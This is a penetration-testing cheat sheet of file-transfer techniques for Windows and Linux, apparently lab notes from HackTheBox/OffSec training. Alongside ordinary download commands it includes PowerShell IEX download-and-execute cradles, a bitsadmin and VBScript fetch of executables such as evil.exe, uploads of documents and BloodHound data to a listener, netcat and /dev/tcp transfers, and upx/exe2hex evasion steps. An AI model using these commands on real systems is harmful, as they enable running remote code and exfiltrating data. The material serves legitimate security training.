FileTransfer
File Transfer Cheat Sheet
Notas para transferir archivos en distintos escenarios y con distintas herramientas.
Windows
Download
PS C:\Users\htb\Desktop> (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.213/lala.txt','C:\Users\htb\Desktop\lala.txt')
PS C:\Users\htb\Desktop> Invoke-WebRequest http://192.168.0.213/lala.txt -OutFile lala.txt
PS C:\Users\htb\Desktop> Invoke-RestMethod http://192.168.0.213/lala.txt -OutFile "C:\Users\htb\Desktop\lala.txt"
PS C:\Users\htb\Desktop> IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.213/lala.ps1')
PS C:\Users\htb\Desktop> Invoke-WebRequest http://192.168.0.213/lala.ps1 | iex
Bypass Internet Explorer’s First Run customization or use cradles
PS C:\Users\htb\Desktop> Invoke-WebRequest http://192.168.0.213/lala.ps1 -UseBasicParsing | iex
C:\htb> reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2
bitsadmin /transfer TRANSFEREXAMPLE http://192.168.0.213/lala.txt C:\Users\htb\Desktop\lala.txt
bitsadmin /transfer job /download /priority high http://192.168.49.169/r.exe c:\\pwn\\r.exe
PS C:\> Import-Module bitstransfer;Start-BitsTransfer -Source "http://192.168.0.213/lala.txt" -Destination "C:\Users\htb\Desktop\lala.txt"
CertUtil: download, base64 encode and decode a file
#Encode
C:\Users\htb\Desktop>certutil.exe -encode lala.zip lala_encode.txt
#Download
C:\Users\htb\Desktop>certutil.exe -urlcache -split -f "http://192.168.0.213/encode.txt" encode.txt
#Decode
C:\Users\htb\Desktop>certutil.exe -decode encode.txt decode.zip
FTP Script
#ftp-script.txt
open 192.168.0.210
USER lorka
lala
bin
get lala.txt
bye
#Transfer with ftp script
PS C:\Users\htb\Desktop> ftp -v -n -s:ftp-script.txt
TFTP
#Enable TFTP (requires admin rights)
PS C:\WINDOWS\system32> DISM /online /Enable-Feature /FeatureName:TFTP
#GET file
PS C:\Users\htb\Desktop> tftp 192.168.0.210 get lala.txt
JavaScript
#down.js
// down.js -- Windows Script Host (JScript) downloader, not Node/browser JS.
// Usage: cscript /nologo down.js <url> <out-file>
// Performs a synchronous GET with WinHttpRequest and writes the raw response
// body to disk through an ADODB binary stream (type 1 = adTypeBinary).
var http = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
http.Open("GET", WScript.Arguments(0), false);   // false = synchronous; Send() blocks until done
http.Send();

var stream = new ActiveXObject("ADODB.Stream");
stream.Type = 1;                                 // binary, so non-text payloads are not mangled
stream.Open();
stream.Write(http.ResponseBody);
// No SaveOptions argument: the ADODB default is create-only, so an existing
// file of the same name makes SaveToFile raise instead of overwriting.
stream.SaveToFile(WScript.Arguments(1));
#Execute
C:\Users\htb\Desktop>cscript /nologo down.js http://192.168.0.213/lala.txt lala.txt
VBScript
#down.vbs
' down.vbs -- Windows Script Host (VBScript) downloader.
' Usage: cscript /nologo down.vbs <url> <out-file>
' Synchronous GET via Microsoft.XMLHTTP; the body is written through an
' ADODB binary stream so non-text payloads survive intact.
Dim httpReq, outStream
Set httpReq = CreateObject("Microsoft.XMLHTTP")
Set outStream = CreateObject("Adodb.Stream")

httpReq.Open "GET", WScript.Arguments.Item(0), False   ' False = synchronous
httpReq.Send

outStream.Type = 1                                     ' 1 = adTypeBinary
outStream.Open
outStream.Write httpReq.responseBody
outStream.SaveToFile WScript.Arguments.Item(1), 2      ' 2 = adSaveCreateOverWrite
#Execute
C:\Users\htb\Desktop>cscript /nologo down.vbs http://192.168.0.213/lala.txt lala.txt
' wget.vbs -- Windows Script Host (VBScript) downloader.
' Usage: cscript wget.vbs <url> <out-file>
' Argument 0 is the URL, argument 1 the local file name. VBScript identifiers
' are case-insensitive, so strUrl here and strURL further down are one variable.
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
' WinHttpRequest proxy-setting constants; declared but not referenced anywhere
' in this listing.
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
' Try WinHttp first, then older XMLHTTP implementations.
' NOTE(review): CreateObject raises an error rather than returning Nothing when
' a ProgID is missing, so these fallbacks only take effect under
' On Error Resume Next, which this listing does not show (the Err.Clear above
' suggests it was intended) -- confirm against the original script.
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
' Synchronous GET (third argument False); ResponseBody is a byte array.
http.Open "GET", strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
' The output goes through a *text* stream one byte at a time: each byte is
' pulled out with MidB/AscB and re-emitted with Chr. strData and strBuffer
' are assigned below but never read.
' NOTE(review): Chr + text-stream output presumably round-trips through the
' system ANSI code page; verify that binary payloads survive on the target's
' locale before relying on this for non-text files.
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile, True)   ' True = overwrite an existing file
strData = ""
strBuffer = ""
For lngCounter = 0 to UBound(varByteArray)
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
Next
ts.Close
#Execute
C:\Users\Offsec> cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
Upload
System.Net.WebClient
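<?php
// upload.php -- minimal receiver for the System.Net.WebClient UploadFile example.
// Expects a multipart/form-data POST whose file field is named "file" and
// stores it under $uploaddir. There is no authentication, size or type check;
// it is only meant for the lab scenario documented here.
$uploaddir = '/var/www/uploads/';

if (!isset($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
    http_response_code(400);
    exit("no file field\n");
}

// The client-supplied name is untrusted input: concatenating it directly let a
// name such as "../x" write outside $uploaddir (path traversal). basename()
// keeps only the final path component.
$uploadfile = $uploaddir . basename($_FILES['file']['name']);

// move_uploaded_file() returns false when the source is not a genuine upload
// or the destination is not writable; report that instead of failing silently.
if (!move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
    http_response_code(500);
    exit("upload failed\n");
}
?>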
#make dir & permission
$ mkdir -p /var/www/uploads
$ chown www-data: /var/www/uploads
C:\Users\Offsec> powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:/users/public/downloads/BloodHound.zip' -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64
PS C:\Users\htb\Desktop> Start-BitsTransfer "C:\Users\htb\Desktop\lala.txt" -Destination "http://10.129.215.180/lala.tx" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential DOMAIN\username
SCP
PS C:\Users\Administrador\Desktop> scp .\lala.txt root@192.168.0.213:/root/
WebServer
Windows Server IIS (needs admin rights)
PS C:\Users\administrator> Add-WindowsFeature Web-Server, Web-Mgmt-Tools
#server path: C:\inetpub\wwwroot
CipherFiles
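function Invoke-AESEncryption {
    <#
    .SYNOPSIS
        Encrypts or decrypts a string or a file with AES-256-CBC keyed from a passphrase.
    .DESCRIPTION
        The AES key is SHA-256($Key) -- no salt and no iteration count, so a weak
        passphrase is as guessable as it would be in the clear. The IV is the random one
        AesManaged generates and is prepended to the ciphertext (first 16 bytes). Padding is
        PaddingMode.Zeros: trailing 0x00 bytes of the plaintext cannot be distinguished from
        padding, so for text input they are trimmed on decrypt. CBC is used without a MAC,
        so the output protects confidentiality only; a tampered ciphertext is not detected.
        These choices are unchanged on purpose so files produced by the earlier version of
        this function still decrypt.
    .PARAMETER Mode
        'Encrypt' or 'Decrypt'.
    .PARAMETER Key
        Passphrase; hashed with SHA-256 to obtain the 256-bit AES key.
    .PARAMETER Text
        String to encrypt (returns Base64 of IV||ciphertext) or Base64 string to decrypt.
    .PARAMETER Path
        File to encrypt (writes <file>.aes) or to decrypt (writes <file> without the .aes suffix).
    .OUTPUTS
        [string] -- the Base64/plaintext result for -Text, or a status message for -Path.
    .EXAMPLE
        Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\lala.txt
    .EXAMPLE
        Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\lala.txt.aes
    #>
    [CmdletBinding()]
    [OutputType([string])]
    Param
    (
        [Parameter(Mandatory = $true)]
        [ValidateSet('Encrypt', 'Decrypt')]
        [String]$Mode,

        [Parameter(Mandatory = $true)]
        [String]$Key,

        [Parameter(Mandatory = $true, ParameterSetName = "CryptText")]
        [String]$Text,

        [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
        [String]$Path
    )

    Begin {
        $shaManaged = New-Object System.Security.Cryptography.SHA256Managed
        $aesManaged = New-Object System.Security.Cryptography.AesManaged
        $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
        $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
        $aesManaged.BlockSize = 128
        $aesManaged.KeySize = 256
    }

    Process {
        # Key derivation: raw SHA-256 of the UTF-8 passphrase (see DESCRIPTION).
        $aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key))

        switch ($Mode) {
            'Encrypt' {
                if ($Text) { $plainBytes = [System.Text.Encoding]::UTF8.GetBytes($Text) }
                if ($Path) {
                    $File = Get-Item -Path $Path -ErrorAction SilentlyContinue
                    if (!$File.FullName) {
                        Write-Error -Message "File not found!"
                        break
                    }
                    $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
                    $outPath = $File.FullName + ".aes"
                }
                $encryptor = $aesManaged.CreateEncryptor()
                $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
                # IV goes first so Decrypt can recover it from the leading 16 bytes.
                $encryptedBytes = $aesManaged.IV + $encryptedBytes
                $aesManaged.Dispose()
                if ($Text) { return [System.Convert]::ToBase64String($encryptedBytes) }
                if ($Path) {
                    [System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
                    (Get-Item $outPath).LastWriteTime = $File.LastWriteTime
                    return "File encrypted to $outPath"
                }
            }
            'Decrypt' {
                if ($Text) { $cipherBytes = [System.Convert]::FromBase64String($Text) }
                if ($Path) {
                    $File = Get-Item -Path $Path -ErrorAction SilentlyContinue
                    if (!$File.FullName) {
                        Write-Error -Message "File not found!"
                        break
                    }
                    $cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName)
                    # -replace takes a regex. The unanchored ".aes" used before matched
                    # any character followed by "aes" anywhere in the path (e.g. inside a
                    # directory name), so only the trailing suffix is stripped now.
                    $outPath = $File.FullName -replace '\.aes$'
                }
                # Anything shorter than one block cannot even hold the IV; fail clearly
                # instead of with an index/transform exception.
                if ($cipherBytes.Length -lt 16) {
                    Write-Error -Message "Input too short to contain an IV"
                    break
                }
                $aesManaged.IV = $cipherBytes[0..15]
                $decryptor = $aesManaged.CreateDecryptor()
                $decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16)
                $aesManaged.Dispose()
                # Trim([char]0) removes the zero padding for text; file output is written as-is.
                if ($Text) { return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Trim([char]0) }
                if ($Path) {
                    [System.IO.File]::WriteAllBytes($outPath, $decryptedBytes)
                    (Get-Item $outPath).LastWriteTime = $File.LastWriteTime
                    return "File decrypted to $outPath"
                }
            }
        }
    }

    End {
        # Dispose is idempotent, so a second call after the one in Process is harmless.
        $shaManaged.Dispose()
        $aesManaged.Dispose()
    }
}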
#Import Module
PS C:\Users\htb\Desktop> Import-Module Invoke-AESEncryption.ps1
#Encrypt file
PS C:\Users\htb\Desktop> Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\lala.txt
#Decrypt file
PS C:\Users\htb\Desktop> Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\lala.txt.aes
Linux
Download
[root@htb Downloads]# wget http://192.168.0.213/lala.txt -O lala.txt
[root@htb Downloads]# curl -o lala.txt http://192.168.0.213/lala.txt
#Primero creamos un certificado
$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
#Origen
$ openssl s_server -quiet -accept 7788 -cert certificate.pem -key key.pem < lala.txt
#Destino
$ openssl s_client -connect 192.168.0.213:7788 -quiet > lala.txt
***Base64 encode and decode with openssl (an encoding, not encryption)***
#encrypt
[root@htb]# openssl enc -base64 -in lala.txt -out lala_encode.txt
#decrypt
[root@htb]# openssl enc -base64 -d -in lala_encode.txt -out lala.txt
Bash Method Script
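#!/usr/bin/env bash
# Minimal HTTP GET over bash's /dev/tcp pseudo-device (no curl/wget needed).
# Writes the RAW response -- status line and headers included -- to stdout,
# so the caller still has to strip the header block before using the body.
# HOST and FILE may be overridden from the environment; the defaults are the
# lab values used throughout this sheet.
set -euo pipefail

HOST="${HOST:-192.168.0.213}"
FILE="${FILE:-lala.txt}"
readonly HOST FILE

# fd 3 becomes a bidirectional socket; under -e the script exits here when the
# host is unreachable or port 80 is closed.
exec 3<>"/dev/tcp/${HOST}/80"

# HTTP/1.1 wants CRLF line endings and a Host header; "Connection: close"
# makes the server end the stream so the cat below terminates.
{
  printf 'GET /%s HTTP/1.1\r\n' "${FILE}"
  printf 'Host: %s\r\n' "${HOST}"
  printf 'Connection: close\r\n'
  printf '\r\n'
} >&3

cat <&3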
PHP
[root@htb Downloads]# php -r '$file = file_get_contents("http://192.168.0.213/lala.txt"); file_put_contents("lala.txt",$file);'
[root@htb Downloads]# php -r 'const BUFFER = 1024; $fremote = fopen("http://192.168.0.213/lala.txt", "rb"); $flocal = fopen("lala.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
[root@htb Downloads]# php -r '$lines = @file("http://192.168.0.213/lala.txt"); foreach ($lines as $line_num => $line) { echo $line; }' > lala.txt
Python2
#!/usr/bin/env python2
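# Python 2 only: urlretrieve lives directly in the urllib module here.
# "from urllib import request" is the Python 3 package layout and raises
# ImportError on 2.x, so the snippet as written never ran under python2.
import urllib

urllib.urlretrieve("http://192.168.0.213/lala.txt", "lala.txt")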
Python3
#!/usr/bin/env python3
import urllib.request

# Fetch the remote file and store it in the working directory as lala.txt.
remote = "http://192.168.0.213/lala.txt"
local = "lala.txt"
urllib.request.urlretrieve(remote, local)
Ruby
[root@htb Downloads]# ruby -e 'require "net/http"; File.write("lala.txt", Net::HTTP.get(URI.parse("http://192.168.0.213/lala.txt")))'
Perl
[root@htb Downloads]# perl -e 'use LWP::Simple; getstore("http://192.168.0.213/lala.txt", "lala.txt");'
Go
//usr/bin/env go run $0 "$@"; exit
package main
import (
"os"
"io"
"net/http"
)
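// main downloads the remote file to lala.txt and exits non-zero on failure.
// The previous version discarded every error: a failed http.Get left
// response nil and panicked on response.Body, and a failed os.Create was
// silently ignored.
func main() {
	if err := download("http://192.168.0.213/lala.txt", "lala.txt"); err != nil {
		os.Stderr.WriteString("download failed: " + err.Error() + "\n")
		os.Exit(1)
	}
}

// httpStatusError reports a non-2xx response. Defined locally so the file's
// import block needs nothing beyond os, io and net/http.
type httpStatusError struct{ status string }

func (e *httpStatusError) Error() string { return "unexpected HTTP status " + e.status }

// download streams remoteURL into a newly created localPath. The request is
// issued before the file is created so a failed GET does not leave an empty
// file behind; deferred closes run before main exits.
func download(remoteURL, localPath string) error {
	response, err := http.Get(remoteURL)
	if err != nil {
		return err
	}
	defer response.Body.Close()
	if response.StatusCode < 200 || response.StatusCode > 299 {
		return &httpStatusError{status: response.Status}
	}
	lfile, err := os.Create(localPath)
	if err != nil {
		return err
	}
	defer lfile.Close()
	if _, err := io.Copy(lfile, response.Body); err != nil {
		return err
	}
	// Explicit Close so a write-back error is reported; the deferred Close
	// then returns "already closed", which is ignored.
	return lfile.Close()
}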
Base64
#Origen
[root@htb Descargas]# base64 upload_nix.zip
UEsDBAoAAAAAAEqEKVFRlJcKIAAAACAAAAAOAAAAdXBsb2FkX25peC50eHQwNDgwOTBiYzdlZDA0
Zjc1ODY1ODk3NWRmOGY4NjJjOFBLAQI/AAoAAAAAAEqEKVFRlJcKIAAAACAAAAAOACQAAAAAAAAA
IAAAAAAAAAB1cGxvYWRfbml4LnR4dAoAIAAAAAAAAQAYAHGdOpjohtYB0cK75fqG1gHXv2od5obW
AVBLBQYAAAAAAQABAGAAAABMAAAAAAA=
#Destino
htb-student@nix04:~$ echo "UEsDBAoAAAAAAEqEKVFRlJcKIAAAACAAAAAOAAAAdXBsb2FkX25peC50eHQwNDgwOTBiYzdlZDA0Zjc1ODY1ODk3NWRmOGY4NjJjOFBLAQI/AAoAAAAAAEqEKVFRlJcKIAAAACAAAAAOACQAAAAAAAAAIAAAAAAAAAB1cGxvYWRfbml4LnR4dAoAIAAAAAAAAQAYAHGdOpjohtYB0cK75fqG1gHXv2od5obWAVBLBQYAAAAAAQABAGAAAABMAAAAAAA=" | base64 -d -w 0 > upload_nix.zip
Netcat
**Method1**
#Origen
[root@htb]# nc -lvnp 7788 < lala.txt
#Destino
[user@target]# cat < /dev/tcp/192.168.0.213/7788 > lala.txt
**Method2**
#Origen
[root@htb]# nc 192.168.0.210 7788 < lala.txt
#Destino
[user@target]# nc -lnvp 7788 > lala.txt
SCP
[root@htb ~]# scp root@192.168.0.213:/root/lala.txt lala.txt
Upload
SCP
#Normal transfer
[root@htb]# scp lala.txt user@192.168.0.213:/dir/path/
#Con certificado
[root@htb]# scp -i cert.pem lala.txt user@192.168.0.213:/root/
RDP
#Compartir carpeta por RDP
[root@htb ~]# rdesktop 192.168.0.138 -r disk:linux='/root'
SMB
Impacket SMBserver
#SERVER
impacket-smbserver -username lorka -password lala -smb2support SERVER $(pwd)
impacket-smbserver -smb2support SERVER $(pwd)
#CLIENT (with creds)
net use x: \\10.10.10.22\SERVER /user:lorka lala
copy x:\file.exe
WebServer
Python2
[root@htb]# python -m SimpleHTTPServer 7788
Python3
[root@htb]# python3 -m http.server 7788
Ruby
[root@htb]# ruby -run -ehttpd . -p7788
PHP
[root@htb]# php -S 0.0.0.0:7788
FTP Server
#Install lib
[root@htb ~]# pip3 install pyftpdlib
#Run Server
[root@htb ~]# python3 -m pyftpdlib --user=lorka --password=lalala -w -p 21
Misc
upx
[root@htb]# upx -9 file.exe
exe2hex
[root@htb]# exe2hex -x nc.exe -o nc.cmd